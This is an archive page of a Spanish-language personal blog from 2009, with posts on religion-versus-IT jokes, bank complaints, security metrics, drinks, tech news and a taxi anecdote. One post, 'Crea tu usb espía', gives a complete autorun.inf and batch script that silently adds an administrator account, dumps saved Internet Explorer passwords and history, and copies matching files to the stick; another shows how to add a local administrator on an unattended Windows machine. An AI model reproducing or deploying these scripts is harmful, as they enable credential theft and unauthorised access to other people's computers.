Archivo del blog

Que tan pequeños o grandes somos en el universo?

Conoce nuestro pálido y pequeño punto azul

Que es el ego y como ser realmente felices?

Atrévete a conocerte para liberarte de todas tus preocupaciones

10 Tips para tus propósitos de año nuevo

Cómo evitar que fracasen a medio camino

La verdad sobre la Depresión

Testimonios y avances en su estudio

Medicina Tradicional Mexicana

Siglos de tradición y conocimiento sobre la salud

martes, 22 de diciembre de 2009

Religión Informática

No les sugiero leer este post.

Es resultado del desvelo de hoy y una estúpida idea

encontrar las similitudes entre la religión y las tecnologías de información

Para los valientes: aquí va

La historia de windows. Un código cerrado, dogmático. Que era sostenido por Bill Gates como una eminencia que buscaba iluminar al mundo con una solución a sus problemas. Aquel que no quisiera usar windows estaba en problemas porque se les cerraban muchas puertas. Windows cuesta y Tarde o temprano debido a la rebeldía de la gente fue necesario implementar mecanismos de castigo para la piratería. Hoy día aquellos que usan windows pirata pueden ser legalmente atacados. Muchos han optado por estar en contrar de windows debido a su histórico monopolismo y ahora muchos optan por sistemas operativos alternos

De igual manera la religión católica es dogmática y cerrada. El papa es el estandarte de la misma y busca mediante la palabra divina ofrecer redención y solución a los problemas mundanos. Aquellos que se han interpuesto a la religión católica han sido quemados, asesinados, callados... Ir a la iglesia cuesta. Muchos ahora están en contra de sus creencias dada su baja congruencia con sus propios principios

Del otro lado está Linux. Una corriente filosófica que comparte un mismo kernel y donde pueden existir diferentes distribuciones (fedora, ubuntu,...). La gente que cree en linux comparte con los suyos esto sin esperar nada a cambio y se empeña en mejorar las aplicaciones.

Los cristianos por su parte comparten la creencia en la biblia pero son libres de interpretarla en algunos aspectos y tienen sus modos de vida. Algunos no toman nada, otros si pueden tomar, algunos creen en la existencia de dinosaurios otros no (esto lo digo basado en una encuesta que hice a cristianos). Y la mayoría de ellos se empeña en reproducir su palabra.

Aquí otras comparaciones

BIblia de bolsillo: usb
Cruz: Tux
Meditación: hibernación
Mandamientos: Licencia open source
Reencarnación: full restore
Exodo: DRP
Moisés separando el mar: virtualización
Perdon de los pecados: última configuración aceptada
Confirmación: "Está seguro de que quiere borrar los archivos"
Unción: Format -f
Demonios: malware
confesionario: vpn
Vaticano: sillicon valley
Bautizo: USERID
Cuaresma: maintenance window
tentación: phising
misa: cualquier reunión masiva de microsoft o apple
confesión: yahoo answers
cirio: batería

lo se, fue un post lamentable, pero ya me siento mejor

viernes, 18 de diciembre de 2009

Creo que se les perdió su perro

En mi vida he tenido la oportunidad de ver muchas cosas

El boom del internet
Eclipses
Lluvias de estrellas
Caída del muro


Pero difícilmente algo tan impactante como un perro que se mata solo



miércoles, 16 de diciembre de 2009

Esas Cosas que encabronan - La banca


De por sí creo que los bancos (aunque son un mal necesario en nuestro sistema económico) son odiosos por naturaleza, hace algunas semanas me nació del diafragma postear sobre algo que realmente me encabrona.


En esta ocasión me remitiré a 2 tópicos

Los cajeros
La banca por internet

Puede ser que no todos los bancos caigan en esto pero al menos 2 o 3 seguro sí

Primer asunto, necesitas efectivo, vas al cajero, todo chido y de repente empieza la oleada de preguntas:
desea usted donar
esta seguro que no quiere donar
es usted tan ojete que no quiere donar y pagar nuestros impuestos?
Felicidades acaba de ganarse un seguro mensual por solo $$$
Seguro qu eno lo quiere
y aparte te imprimen un ticket para que a huevo lo leas, no vaya a ser que el ticket tenga tu saldo o algo así
Y el colmo es que en muchos cajeros no puedes cancelar y saltarte los mensajes, tienes que chutartelos a wiwi porque tiene tu tarjeta y tu sesión abierta

La otra, muchos bancos cobran la banca por internet aunque en realidad les hace el paro con costos de personal y que no hay colas interminables en sus sucursales
Que sus clientes hacen autoservicio, etc etc. Es un robo, deberían al contrario cobrar menos comisiones.

En sí los bancos me causan agruras, es muy triste ver como gente se vuelve millonaria usando el dinero de los demás y aparte les pagamos por hacerlo... SAD SAD SAD

Creo que mi alma descansó, se vale comentar

Happy flaming

Crea tu usb espía


Concepto:

Crear una usb con motivos demostrativos sobre lo fácil que es usar este medio con fines peligrosos

Crearemos una usb que al momento de conectarse al USB realiza las siguientes acciones:

1 - Crea un usuario administrador
2 - Escribe archivos en la máquina destino
3 - Copia información del sistema para ataques posteriores
4 - Copia archivos al USB
5 - Roba contraseñas guardadas de IEXPLORER e historial




Que necesitamos:

Memoria USB
Descargar el sw iepv y el iehv y descomprimir el contenido en la raiz de la USB

El método que usaremos no usa sw especializado, ya que casi siempre estas herramientas son detectadas por los antivirus actualizados. Lo que haremos es "a patín", es decir crearemos archivos bat que llamarán diferentes rutinas que harán las fechorías

Manos a la obra

Lo primero es crear un archivo autorun.inf en la raiz de la usb, mismo que será quien inicie automáticamente el archivo bat que crearemos al conectar la memoria
* NOTA: el windows puede estar configurado para no correr autorun cuando algo se conecta, pero casis siempre es lo contrario

Para crear el autorun abrimos un notepad y escribimos:
[autorun]
open=usbproject.bat

Ahora guardamos el archivo como autorun.inf
*recuerden que al darle save as hay que seleccionar donde dice "all files", de lo contrario lo guarda como autorun.inf.txt

Creamos una carpeta llamada archivosrobados

Ahora abrimos notepad y ponemos el siguiente código (los campos en mayúscula pueden ser cambiados)


@echo off

net user USERNAME PASSWORD /add

net localgroup administrators USERNAME /ADD

mkdir c:\DIRECTORIO

echo "TEXTO QUE QUEREMOS ESCRIBIR EN EL WARNING" > c:\DIRECTORIO\NOMBREARCHIVO.txt

start iepv.exe /sverhtml NOMBREOUTPUT.html

start iehv.exe /sverhtml NOMBREOUTPUT2.html

systeminfo > NOMBREOUTPUT3.txt

dir d:\ /s /b | find "STRINGDEBUSQUEDA" >NOMBREOUTPUT4.txt

setLocal EnableDelayedExpansion

for /f "tokens=* delims= " %%a in (NOMBREOUTPUT4.txt) do (
set /a n+=1
set v!n!=%%a

copy "%%a" "%CD%\archivosrobados"

)
set v

dir c:\ /s /b | find "STRINGDEBUSQUEDA" >NOMBREOUTPUT4.txt

setLocal EnableDelayedExpansion

for /f "tokens=* delims= " %%a in (zoutput.txt) do (
set /a n+=1
set v!n!=%%a

copy "%%a" "%CD%\archivosrobados"

)
set v

exit

ahora guardamos el archivo como usbproject.bat

Y listo, hemos terminado.

No olviden después de correr la herramienta eliminar al usuario creado, etc etc

Happy usbing

Material extra
Explicación para configurar el código

USERNAME: nombre del usuario que crearán
PASSWORD: Password que asignarán a dicho usuario
DIRECTORIO: ruta donde depositarán un archivo falso para demostrar que es posible hacerlo
NOMBREOUTPUT: nombre del archivo que contendrá contraseñas de IEXPLORER
NOMBREOUTPUT2: nombre del archivo que contendrá el historial
NOMBREOUTPUT3: nombre del archivo que contendrá información del sistema
NOMBREOUTPUT4: nombre del archivo temporal donde se guardan los archivos a copiar

martes, 15 de diciembre de 2009

create permisos de administrador en XP

Mucho se ha dicho sobre la seguridad perimetral, antivirus, bla bla

Lo cierto es que si la gente deja sus equipos desatendidos se pueden hacer maravillas

Hoy posteo uno de los trucos más baratos que existen en windows

Cómo crear un usuario local con permisos de administrador en 2 patadas sin tener permisos antes


Para este ejercicio haremos uso de la herramienta básica Command Prompt
Así es: viles líneas de código

Lo primero que debes hacer es abrir el cmd (command prompt)

Una vez hecho lo anterior haremos uso del comando net

Basta con escribir:

net user NOMBREDEUSUARIO PASSWORD /add

Este comando creará el usuario

Posteriormente le daremos permisos de administrador a ese usuario creado:

net localgroup Administrators NOMBREUSUARIO /add

Ahora que si lo que queremos es cambiar el password de un usuario basta con teclear:

net user NOMBREDELUSUARIO * /NOMBREDELDOMINIO

Es molesto ver que es tan sencillo no?

Pues así es mis amigos, así que vayan pensando en regular sus comandos net

Happy netting

martes, 8 de diciembre de 2009

Seguridad en redes wireless




Mucho se ha dicho ya del tema de seguridad en redes inalámbricas

Me imagino que más de uno de ustedes se ha puesto a auditar la seguridad de algunas redes propias o vecinales, jejeje

Precisamente para quienes quieren aprender más sobre este tema y sobre las vulnerabilidades más comunes existe el sitio http://wirelessdefence.org/

En este lugar encontrarán información que va desde como crear una laptop para auditorías hasta ver las herramientas una por una con objetivos educacionales

de manera adicional, les recuerdo que existe wifislax. Distribución customizada basada en slackware (distro linux) que corre desde live cd o desde USB

lunes, 7 de diciembre de 2009

Si no lo mides.... no lo mejoras - to protect and serve


Una de las cosas más difíciles en seguridad de información es mostrar que tan seguro estás, que tan bien haces tu chamba como administración de la seguridad.

Precisamente por eso es importante siempre tener un esquema de medición basado en indicadores de performance e indicadores meta



No seré demasiado teórico y procuraré entrar a la práctica. Sólo antes quisiera aclarar conceptos básicos:
- KPI: key performance indicator (que tan bien vas)
- KGI: key goal indicator (que lograste)

Existe mucha confusión en como usar esta nomenclatura en los indicadores así que nos limitaremos a llamarlos como tal y los usaremos como KPIs o KGIs dependiendo de la situación. Lo importante es medirlos y que sean útiles, no tanto como los denominemos

El proceso básico de gestión de indicadores en lenguaje coloquial es el que todos conocemos:

Gestión estratégica
- Qué quiero lograr
- A donde quiero llegar
- Cómo puedo medir eso

Comunicación, ejecución y mejora
- Cómo voy hacia dicho logro
- Lo logre?
- Que, cuando y cómo tengo que mejorar
- Ahora sí ya lo logré

Redefinición de estrategia
- Ok, ahora que sigue?

Algo básico para definir indicadores útiles es usar el ya conocido esquema SMART
S: Specific (libres de ambigüedad, que no te confundas al interpretarlos, que midan algo específico, no subjetividades de subjetividades)
M:Mesurable (que se puedan medir)
A:Achievable (que se puedan alcanzar, indicadores soñadores sólo sirven para eso, par asoñar)
R:Relevant (que realmente sean importantes y por si mismos te expliquen lo que quieres medir)
T: Time Framed (que se puedan medir y comparar en el tiempo)

Una sugerencia más antes de ver ejempos
Traten de jerarquizar lo que quieren medir
Vayan de lo que el negocio quiere ver, luego lo que los clientes quieren ver, luego lo que el CIO y depto de sistemas quiere ver, y luego lo que los responsables de seguridad quieren ver
Debe existir relación y "cascadeo" para asegurar alineación de necesidades y requerimientos.
Nunca está de más tener un tablero de control para hacerle la vida más facil a quienes reciban l ainformación

Una vez dicho lo anterior, aquí algunos ejemplos:

% De covertura de seguridad



Un indicador que te permite saber que tan controlado y cubierto estás contra las principales amenazas a través de los controles básicos o baseline

Se calcula haciendo escaneos de los dispositvos en la empresa y se comparan contra los logs de los antivirus, antispam, firewalls, etc. Y así se aclara que porcentaje de ellos están protegidos

La desventaja: no te dice que tan bien protegido estás

Compliance de Parches

El tradicional indicador que mediante un escaneo te permite saber cuales equipos no tienen la última versión de parches actualizada y también cuanto tiempo tardan los parches en ser implementados (distribuido en su criticidad)

Aquí es importante hacer variaciones de manera que se adapten a sus necesidades. Por ejemplo, se puede sólo reportar: equipos que les faltan más de 2 parches críticos (no instalados en más de 2 semanas) o parches que tienen más de 2 veces el tiempo máximo permitido para instalarse

Compliance de plataforma instalada

A través de herramientas verificas periódicamente la configuración de tus items de seguridad. Puede extenrese a switches, firewalls e incluso equipos de cómputo
Similar a un scanning de langard pero hecho para configuraciones estándar (hardening style)

De esta manera puedes saber por ejemplo cuantos servidores no cumplen lo establecido en la imagen estándar.

Información detallada te permitiría saber que switches no tienen password, o que puertos no están cerrados, que servicios de sistema operativo innecesarios están arriba, etc etc

Podrías incluso tener calificaciones para poder tener un número(KPI) o podrías obtener %s

Desviaciones a políicas de seguridad

Documentar y medir las ocasiones en que se han violado las políticas de seguridad (al menos las que conoces).
Estas desviaciones pueden ser obtenidas en auditorías o en reportes/incidentes

Reportes de desviaciones de seguridad de usuario

Este indicador consiste en medir que tanto los empleados te notifican sobre temas de seguridad.

Este indicador a veces es mejor mientras más alto es porque quiere decir que la gente está consciente de su responsabilidad con respecto a la seguridad de información

Si después de varios años sigues teniendo niveles altos, perocúpate entonces...

Ataque que atentan a la seguridad de la empresa

Aquí dependiendo de lo que necesites medir pueden haber variables.

Por ejemplo: para los clientes o stakeholders quizá es más importante tener la cuenta de los ataques que afectaron el valor de la empresa (defacements, virus, robo de información, etc que fueron existosos desde el punto del atacante)

Para los responsables de seguridad talvez sería también importante medir el número de ataques en total e incluso a nivel análisis, el tipo de los mismos, su resultado, vulnerabiliad asociada, etc

Usuarios Peligrosos

Esta medición puede más bien ser como un reporte donde vez el top 50 de usuarios que generan más alertas o logs de seguridad (del antivirus, del antispam, de ids, de Active Directory, correo electrónico, etc)con la finalidad de investigar con más detalle.

recordemos que normalmente hay personas que pueden ser focos de seguridad y que mitigando sus vulnerabiliades o conociendo que es lo que realmente pasa podemos reducir considerablemente nuestros riesgos

ALE

Annual Loss Expentancy
Este indicador me parece un poco complejo e incierto. Sin embargo muchas empresas lo utilizan para mostrar cuanto se podría perder durante el año por temas de seguridad de información


Costo de riesgos materializados

El problema de este indicador es que es post-mortem
Una vez efectivo un ataque es importante cuantificar los daños y reportarlo para que en próximos años se tomen en consideración para inversión

de manera similar este indicador puede ayudar a los especialistas a saber que tanto valor no pudieron proteger correctamente para la empresa

Madurez

Para medir procesos de gestión de seguridad se puede medir la madurez del mismo usando frameworks como COBIT o ISO 27001. Con esto puedes tener puntos de referencia para saber como estás con respecto a normas
De manera adicional también se puede crear un modelo de madurez interno aunque esto no es recomendable para poder realizar benchmark

Último comment
No hay una fórmula secreta. Pero seguro hay indicadores que todos podríamos usar para mejorar la transparencia y control. Lo primero siempre será saber que es lo que más queremos medir, una vez controlado esto prosigan con otros tópicos
No traten de comerse al mundo, porque seguro se los va a comer primero a ustedes

Happy measuring

Quiero ir al antro!

Voy a contar los días antes de que Gerza se aprenda esta rola...


domingo, 6 de diciembre de 2009

Para el frío!

Cada quien tiene su remedio para el frío, algunos aplican el tequila, algunos la cobija de tripas, algunos el mezcal, etc. El año pasado en navidad hice una receta Alemana de Glüh Wein que es vino caliente con especias y naranja, muuuy bueno que quita el frío rapidísimo. Por ahí me encontré esta receta de Sbiten, un té (que también se puede hacer con vino) del norte de Rusia que suena muuuy bien para esas noches de frío.

http://www.wikihow.com/Make-Sbiten

Happy warming up!

sábado, 5 de diciembre de 2009

No te metas a mi Facebook

jueves, 3 de diciembre de 2009

El club con el mejor Dress Code

Mi proxima fiesta de cumpleaños será así... ya lo veo venir...

http://thechive.com/2009/12/01/london-club-with-the-best-dress-code-ever-30-photos/

Hack your brain to sleep less (and better)

Navegando por ahí me encontré este artículo sobre una interesante teoría. Nuestro cuerpo se regenera y descansa mientras dormimos, pero no todas las fases del sueño tienen este poder regenerador. La fase de REM (Rapid Eye Movement) es la que tiene mayores efectos regenerativos. Uno de estos ciclos dura alrededor de 20 minutos y para llegar al siguiente necesitas al rededor de 2 horas de tiempo de sueño "desperdiciado". Si puedes hacer que tu cerebro llegue a estas etapas de REM sin todo ese tiempo de relleno entre ellas, entonces puedes dormir poco y estár totalmente lúcido. El artículo que les pongo a continuación muestra algunos metodos para lograrlo. Algunos son bastante irreales (sobre todo los últimos en los que duermes solo 2 horas en total) porque los horarios de siestas deberán ser muy rígidos. Sin embargo dependiendo de su estilo de vida, podrían ser posibles.

http://dustincurtis.com/sleep.html

Creo que voy a intentar alguno en el que tenga que dormir solo 4.5 horas...

Happy "no sleeping"

lunes, 30 de noviembre de 2009

¿Qué es un naco?

Fui invitado a una fiesta "temática" en la que hay que vestirse de Naco. Se me ocurrieron varios disfraces pero antes de cometer alguna "falta a la naqués" decidí documentarme en "la interneis" para obtener mejores ideas. Así fue como encontré este artículo que explica de manera muy sencilla el origen del término "Naco" y además da ejemplos universales e indiscutibles sobre qué hace y cómo se comporta un naco.

Les dejo el artículo completo para que le echen un ojo.


Saludos a la banda!

miércoles, 25 de noviembre de 2009

La diferencia entre whiskeys: Bourbon y Scotch

Siempre había querido saber la diferencia entre un whiskey Bourbon y un Scotch y hoy decidí investigarlo.

Les dejo dos videos donde está muy clara la diferencia pero se los explico brevemente:

Bourbon: Además de llamarse así por ser originario de Bourbon Kentuchy, está hecho entre un 51% y 80% de Maíz.

Scotch: Además de llamarse así por ser originario de Escocia, está hecho 100% de Malta.







En lo personal me gusta más el Bourbon y lo tomo tanto "on the rocks" como con "agua y refresco de cola" lo que teóricamente no debe hacerse con el Scotch pero con Bourbon está permitido.

Happy drinking.

martes, 24 de noviembre de 2009

Cómo sacarle más provecho a la cafeina



Para todos los cafeinomanos, les dejo un artículo que les ayudará a sacarle el mayor provecho a cada taza de café.

Sobre todo en un trabajo "no monotono" como el nuestro, es importante saber que el consumo normal de café puede resultar en incluso menor productividad de la normal. Sin embargo, tomar café cuando ya estamos alertas puede ayudarnos a alcanzar esos picos de "inspiración" o "creatividad" que necesitamos.

Otra cosa muy interesante es que el cuerpo se vuelve tolerante al café muy rápidamente pero de igual forma con 5 días de abstinencia podemos regresar a un nivel normal de tolerancia.

Yo se que muchos como yo toman café por gusto pero para algunos otros "no es un lujo sino una herramienta" así que conocer estos datos nos ayudará a sacarle el mejor provecho.

Happy waking up!

lunes, 23 de noviembre de 2009

Intel ya trabaja en el control mentral

Intel ya está comenzando sus planes de estudios para implantar chips en nuestros cerebros que les permitirá leer ondas cerebrales para realizar tareas como controlar nuestra PC, teléfono celular y navegador web.

Intel comenzará a realizar las pruebas con voluntarios y planea tener la tecnología lista para el 2020. Afortunadamente el implante solamente tendría permisos de lectura sobre nuestras ondas cerebrales, y aparte de vanidosos usos como twittear tus pensamientos sin importancia las 24 horas del día, ayudaría enormemente a personas discapacitadas para que puedan interactuar con un PC sin tantos problemas. ¿Están dispuestos a dejarse implantar un chip?

más info: http://www.readwriteweb.com/archives/the_brain_chip_cometh_it_cometh_from_intel.php

Microsoft y News Corp en negociaciones para bloquear Google

Esta noticia en verdad me alarma, ¿el que tiene dinero realmente puede hacer lo que sea?

News Corp., la empresa detrás de la cadena FOX, MySpace y gran parte de la prensa sensacionalista en Estados Unidos está en negociaciones con Microsoft para bloquear al bot indexador de Google por unos cuantos millones de dólares.según esto News Corp. ya había estado evaluando la posibilidad de bloquear a los motores de búsqueda para darle un toque premium a su red y hacer que la gente pague por éste contenido. Microsoft por su parte ha iniciado conversaciones con varios de los grandes del Internet para que desaparezcan de Google y sus resultados sean exclusivos de Bing.

Aquí es donde veremos quién necesita más a quien en esta relación simbiótica, donde un motor de búsqueda es inútil sin resultados, y un sitio web no es rentable si no tiene visitas que vean la publicidad.


màs info: http://www.computerworld.com/s/article/9141319/Report_Microsoft_may_pay_News_Corp._to_delist_from_Google

viernes, 20 de noviembre de 2009

Sistema Operativo Chrome

¿no era solamente Chrome un navegador para internet?, pues resulta que ya es un Sistema Operativo. A mi particular gusto tiene muchas ventajas si la mayoría de lo que haces es en Internet, lo mejor es el tiempo de carga del sistema, muy rápido y prácticamente tu maquina se convierte en un navegador de Internet...

Para más información ver el sig. video:

jueves, 19 de noviembre de 2009

Ciberguerra - la nueva guerra que viene

Una nueva guerra ha sido predecida desde hace apróximadamente una decada, la Ciberguerra, me llamó la atención el tema en base a que en un informe de Mcafee declara que es urgente que los sectores publicos y privados colaboren para asegurar cualquier ciberataque.

Actualmente todo esta controlado por computadoras, antes de irse a un ataque se hacen simulaciones, se tienen a fondo los mapas, satelites, etc etc. ¿que pasaría si antes de dicho ataque fisico se pasa a uno virtual donde afecte toda la infraestructura de un país y no hablemos de intentos aislados de algunos hackers, si no de elites informaticas con alta disposición de tecnología y recursos. Imaginen que sabotean las centrales electricas, provocan paros en las fabricas, incendios, inundaciones, etc.


Parece salir de una pelicula todo esto, pero es una realidad, por ejemplo, según muchos expertos China ha entrado en las redes de datos de EEUU y los militares chinos han invertido mucho dinero en crear contramedidas electrónicas, según un informe este tipo de técnicas puede permitir ganar una guerra antes de que comience. EEUU no se queda atras, desde hace años tiene estrategias para una eventual ciberguerra, ya cuentan con un Cybercomando para defender datos, comunicaciones, redes militares y tambien estan preparandose en inhabilitar redes de eventuales enemigos, comenta Rober Elder de la fuerza aérea.

Otro ejemplo de esto, es lo que paso en Estonia hace relativamente poco tiempo, donde quedo completamente desconectado del mundo por los múltiples ataques digitales recibidos. Si los responsables fuesen simples estudiantes que pasan el tiempo en su casa derribando redes de datos de un país como hobby, realmente estamos en problemas.

Por otro lado, las armas nucleares de largo alcance están dirigidas por comutadoras, imaginen que alguien tome el control de ellas, o por lo menos inutilizar sus sistemas para convertirlas en basura.

Articulos relacionados:
http://bloghardwareysoftware.blogspot.com/2007/07/ciberguerra-estados-unidos-se-prepara.html

http://www.belt.es/noticias/2003/abril/14_18/14/Ciberguerra_15.htm

http://www.muyinteresante.es/index.php/todas-reportajes/56/3539-iesto-es-la-ciberguerra

http://www.itespresso.es/es/news/2009/11/17/mcafee-advierte-sobre-la-ciberguerra

http://www.neoteo.com/ciberguerra-la-guerra-que-viene.neo

Beta de Microsoft Office 2010

Si alguien tiene el gusto y el tiempo disponible, puede descargar ya la beta de Microsoft Office 2010: http://www.microsoft.com/office/2010/es/download-office-professional-plus/default.aspx

Lo que me parecio muy raro fue una advertencia de Microsoft, publicada en el mismo link, en la parte que dice "Esto es lo que necesita saber" y dice: "Proteja su equipo y los datos. Asegúrese de realizar una copia de seguridad de sus datos y no pruebe Office Professional Plus 2010 Beta en su equipo personal o en el de su empresa".

¿como? ¿entonces no lo instalo? ¿mensaje subliminal? si no lo instalo en mi equipo personal o de mi empresa, ¿en cual lo instalo? ¿en uno que no sea mio? si es así que alguien me preste su compu para instalarlo ;)

Vulnerabilidad en Adobe Flash

Esto suena un poco dramatico, pero según la empresa de seguridad Foreground (http://www.foregroundsecurity.com/) existe una vulnerabilidad que podría atacar al 99% de los usuarios que utilizan flash, indica que cualquiera es vulnerable.

El remedio, es bastante extremo al afirmar que para los usuarios que quieran protegerse “deshabilitar completamente flash es la única manera de estar seguros, aunque pierdan una gran parte del valor de Internet”.

Por mi parte estaré atento a las noticias, ya que en definitiva desactivar el contenido flash es quitarle mucho sabor a la navegación.

"GO" Nuevo lenguaje creado por google

Google sigue metiendose en todos lados, ahora ha creado un lenguaje de programación Open Source, el cual promete mucho.. esto basandose en mayor rapidez y sencillez.

Será un lenguaje dinamico (como phyton) y seguro como java y c++, acorde a los videos que muestran en su sitio se ve una velocidad impresionante de compilación.



más info: http://golang.org/

martes, 17 de noviembre de 2009

Google search future

Con la entrada al negocio de bing, el buscador de Microsoft y la constante intención de google de colaborar con los demás circula este video

Que opina google del futuro de la búsqueda?

COnozcan a la mera mera de esa división y sus ideas



Defacement Simultaneo en Mexico


Aquí pueden echarle un ojo a las noticias donde se puede ver la info completa

http://pateandopiedras.com/?p=21540

http://www.poblanerias.com/alertadigital/25676-hackean-pagina-web-de-sdr-en-puebla.html

lunes, 16 de noviembre de 2009

Landslide

Ahora que estuve en la gran manzana fui a un lugarcito de Blues llamado justamente "Terra Blues". La música era verdaderamente buena y el ambiente muy Ad-Hoc. Particularmente me gustó esta canción y tuve a bien grabar un video de ella. Buscando sobre la rola me encontré con que es un clásico de los tiempos de Fleetwood Mac, hay cover de Dixie-Chicks y hasta en Australian Idol. Aunque sinceramente me quedo con la versión de Terra Blues...


domingo, 15 de noviembre de 2009

Zenhabits - Más productivos y más felices

El sitio Zenhabits es un blog bastante interesante que tiene un compendio de consejos útiles para nuestro día y vida en general con la intención de hacernos más sencillo trabajar y más agradable vivir

Zenhabits



De seguro al menos 2 o 3 tips serán bien recibidos
uno de ellos puede funcionar para altair que consiste en decir como lograr dormirse temprano

Cómo saber donde hostear mis servicios?

En más de una ocasión ha surgido la pregunta: cómo se con quien hostear mi página?

Aquí una buena liga con una guía completa de cómo seleccionar al mejor proveedor

Aunque seguro estro funciona más para microempresas seguro hay buenos tips para quienes trabajen en una empresa grande

Website Monitoring

No importa que tan bien tengan monitoreada la infraestructura, el middleware, etc etc
A final de cuentas lo que importa es que el sitio funcione!!!

A muchos especialistas se les olvida monitorear el servicio desde el punto de vista del usuario final y en el caso de sitios web lo mejor es usar herramientas que precisamente los censan desde fuera de tu red



Este sitio permite no sólo ver en vivo como está tu sitio sino que puedes tener servicios que incluyen alertas vía mensajes para saber en que momento tus usuarios no pueden acceder a tus servicios
http://host-tracker.com/

Aquí otra alternativa con otros servicios más especializados
http://mon.itor.us/

En sí hay muchas herramientas, posteen sus predilectas, siempre es bueno colaborar

Happy monitoring

Un taxista como pocos

Este post más que nada es un relato bastante excentrico de mi último viaje al DF.

Seguro no encontrarán algo valioso en este relato para sus vidas pero podrá entretenerlos

A Final de cuentas esto es un blog no?

De eso se trata: de dejar explayarse al literato escondido, de ver las cosas desde otro ángulo... NOTA: no estoy drogado, sólo tenía ganas de escribir



Todo comienza con mi llegada a la TAPO el pasado martes...




Llegué sin equipaje así que tome rápidamente un taxi de la estación con rumbo a insurgentes. Al subir de inmediato la pregunta necesaria en el df: conocoe usted alguna ruta? o desea tomar alguna en especial?

En el df esta pregunta seguro es super valiosa por el tráfico, pero para todos los novatones, es un completo anuncio de: "hey, no conozco el df, viólenme a discreción"

Afortunadamente una semana antes con altair me aprendí una ruta que pasaba por el famoso churubusco y fue mi escape triunfal a dicha pregunta

Una vez en el camino todo marchaba como de costumbre, mentadas de madre, cruces inadecuados, rebases por la derecha, un día hermoso como cualquier otro... Hasta que decidí romper el umbral pasaje-taxista con la siguiente frase: "Y como les va con Ebrard?"

ERROR!

El mestizo espíritu oculto de aristóteles, edipo, valentín trujillo y azrael tomó el control de aquel chofer de taxi...

Después de una cátedra de política y sociedad (debo decir dentro de los niveles de la cordura y la elocuencia) comenzó una explicación detallada y poderoza sobre la realidad de las cosas, la verdad absoluta, la única verdad...

Me ahorraré detalles tanto de mi mentor como de mis caras de asombro, contradicción y por momentos pánico

Tomando como argumento el tráfico, inició su letanía:

"Todos los viernes se pueden ver los robóticos. Así les llamo yo porque parecen robots cuando salen del trabajo. Van a 40 por hora. Con sus cadas como de tarugos... Con la vista perdida, así mire...

Sabe porqué van así? Por sus viejas. No quieren verlas. Porque saben que nomás lleguen van a estarlos Chingue y ghingue y chingue!!

Al otro día ve uno a los lucidos. Esos a los que sus viejas los sacan a pasear. Es la verdad. Ellas los sacan a ellos para demostrar como los tienen... Controlados...

Pinches viejas, son listas pero también son tarugas!!

Deberían levantar a sus hombres, no humillarlos..."

Después de varias preguntas aclaratorias quedé pasmado por el correcto soporte teórico de sus postulados...

Aunque aquí va lo mejor (digamos la cúspide de su lucidez astral):

"Después de todos estos años he entendido y he comprobado que las mujeres tienen 5 obsesiones:

- La primera es el sometimiento: sí, desde chiquitas, yo las veo, que tienen que hacer que los demás decidan lo que ellas quieren
- La segunda es el control, el control joven. Ya que uno decide lo que ellas quieren ahora se ponen a decir que corbata usar, que ese color no te queda, que vas muy rápido
- La tercera: la esclavitud; la esclavitud joven. Hasta que no logran que sus maridos anden con caras de tarugos llevando la carreola, manejando a donde ellas quieren, te alejan de tus amigos, familia... Nooo, si los hijos no son para otra cosa, son para esclavizarnos!!!
- La cuarta mi joven: el arrebato. Después de unos años que se cansan de ti, te quitan todo: los coches, la casa, todo... les gusta verte sin nada, desamparado
- Y la última que es la más ruin y terrible: la liquidación. "

Allí es donde no pude aparentar extrañeza. " Liquidación?"

" Sí joven, como lo oye. Ellas lo quieren liquidar a uno. Pero no son tarugas. Lo hacen poco a poquito. Yo estuve enfermo del pancreas. Pero me di cuenta. Me estaban dando cianuro de poquito en poquito. Ha visto las botellitas de veneno para ratas? unas como chiquitas?
Así son joven, creame, ellas nos enferman a propósito para deshacerse de nosotros. Pero yo me di cuenta a tiempo! Porque cree que hay tanto diabético en el país???

Nos están matando de poquito en poquito. Cuídese joven. Usted es casado?"

- "No"
- "usted no tiene cara de casado, usted se ve listo. Mire joven yo le voy a decir algo. El día en que usted firme, ese día se acabo el sexo agradable. después de eso olvídese, lo van a extorsionar con eso. Que me duele la cabeza, que no se que. Yo no se que se hacen ellas si bien que también lo quieren, pero son mañosas... pero tarugas"

Antes de tener más detalles de la interesante teoría... La vida me jugó sucio y llegué a mi destino con ganas de decirle que me llevara a otro lado para seguir escuchándolo...

E igual que mis temores... el taxista se fue alejando y alejando, perdiéndose entre parabrisas y smog... entre historias de cianuro, de alcohol, de contradicción



viernes, 13 de noviembre de 2009

Gran Rola - DJ Tiesto Feat Dressden

Hola

Les dejo esta gran rola de DJ Tiesto. Lo bueno empieza por ahí del 1:30.




Enjoy!

Vista de calle en google maps para México!


Fue grande mi sorpresa al encontrarme hoy con que Google maps ya tiene la funcionalidad de vista de calle para las avenidas principales de México incluyendo Puebla y Cholulita la Bella... les dejo una muestra.


jueves, 12 de noviembre de 2009

Linux ha cumplido su mayoría de edad

Linux acaba de cumplir sus 18 primaveras alcanzando su mayoría de edad. Con el paso del tiempo hemos visto su maduración, sobre todo con la creciente entrada al sector empresarial, esto demuestra el grado de confianza que ha dejado sentir con resultados palpables del mismo producto. ¿cómo algo gratis podía ser confiable?, Linux nos ha respondido con hechos.

Su creciente popularidad se debe, entre otras razones, a su estabilidad, al acceso al código fuente, a la independencia de proveedor, a la seguridad, a la rapidez con que incorpora los nuevos adelantos tecnológicos, a la escalabilidad, a la activa comunidad de desarrollo que hay a su alrededor, a su interoperatibilidad y a la abundancia de documentación para los procesos finales de implementación.



Un poco de remembranza:

- Abril 1991 Linus Torvalds de 21 años comienza a trabajar en lo que seria el nucleo de Linux

- 25 agosto 1991 Torvalds escribió en el grupo de noticias com.os.minix:
"Estoy haciendo un sistema operativo (gratuito, sólo un hobby, no será nada grande ni profesional como GNU) para clones AT 386(486). Llevo en ello desde abril y está empezando a estar listo. Me gustaría saber su opinión sobre las cosas que les gustan o disgustan en minix, ya que mi SO tiene algún parecido con él.[...] Actualmente he portado bash(1.08) y gcc(1.40), y parece que las cosas funcionan. Esto implica que tendré algo práctico dentro de unos meses..."

- 17 septiembre de 1991 se lanzó la versión 0.01 de Linux. Tenía 8,413 líneas de código (actualmente tiene mas de 10millones), contaba con 88 archivos (hoy 27,878) y pesaba 0.267 MiB (hoy 322.3 MiB).

Los bailables de la secundaria

